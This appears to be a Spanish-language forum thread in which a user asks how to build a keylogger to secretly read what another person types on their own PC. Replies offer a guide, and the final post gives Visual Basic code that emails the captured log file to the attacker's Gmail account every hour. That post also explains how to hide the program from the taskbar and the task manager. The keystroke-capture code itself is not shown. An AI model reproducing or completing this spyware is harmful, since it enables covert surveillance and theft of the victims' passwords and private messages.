Ayuda para hacer un Keylogger
-
**Hola, pues ya que aqui hay muchos expertos en esto, estoy preguntando aver si alguien me ayuda a hacer un keylogger, seria que yo le pasara a otro el keylogger y que de mi PC vea que escribe el desde su pc, es posible? Gracias :miau: **
-
Sí, es posible, incluso con VB xD
Metes el código del keylogger, metes otro código para hacerlo invisible, y metes otro que te cree un archivo con todo lo que ha hablado en un directorio, y luego otro código para hacer que envíe ese archivo a tu email xD -
es muy posible si algo dame mp te mando una guia en pdf
-
yo tambien quieron una guia xDDD
mandamela tambien -
**Bueno, puedes hacer un sensillito por Visual Basic 2008
Necesitas una cuenta de gmail para hacerlo :grito:
importas los siguientes elementos:
Imports System.Web Imports System.IO Imports System.Net.Mail
Ahora añades un Timer al form y lo pones con 1 intervalo de 1 hora, y en el Timer1_Tick añades lo siguiente:
Dim mail As New MailMessage() Dim Attach As Attachment Dim SmtpServer As New SmtpClient SmtpServer.Credentials = New Net.NetworkCredential("tucuenta@gmail.com", "contraseña del gmail") SmtpServer.Port = 587 SmtpServer.Host = "smtp.gmail.com" SmtpServer.EnableSsl = True mail.To.Add("tucuenta@gmail.com") mail.From = New MailAddress("cuenta@gmail.com") mail.Subject = "Asunto" Attach = New Attachment(Environ$("windir") & "\bhlg.txt") mail.Attachments.Add(Attach) mail.Body = "mensaje" SmtpServer.Send(mail) End Sub
Luego en las propiedades del form marcas ShowinTaskBar y ShowIcon en False, y haces invisible el form poniéndole en el código Me.Hide () y luego también para que no salga en el administrador de tareas añades esta línea al código:
App.TaskVisible = False
Espero haberte ayudado ;)**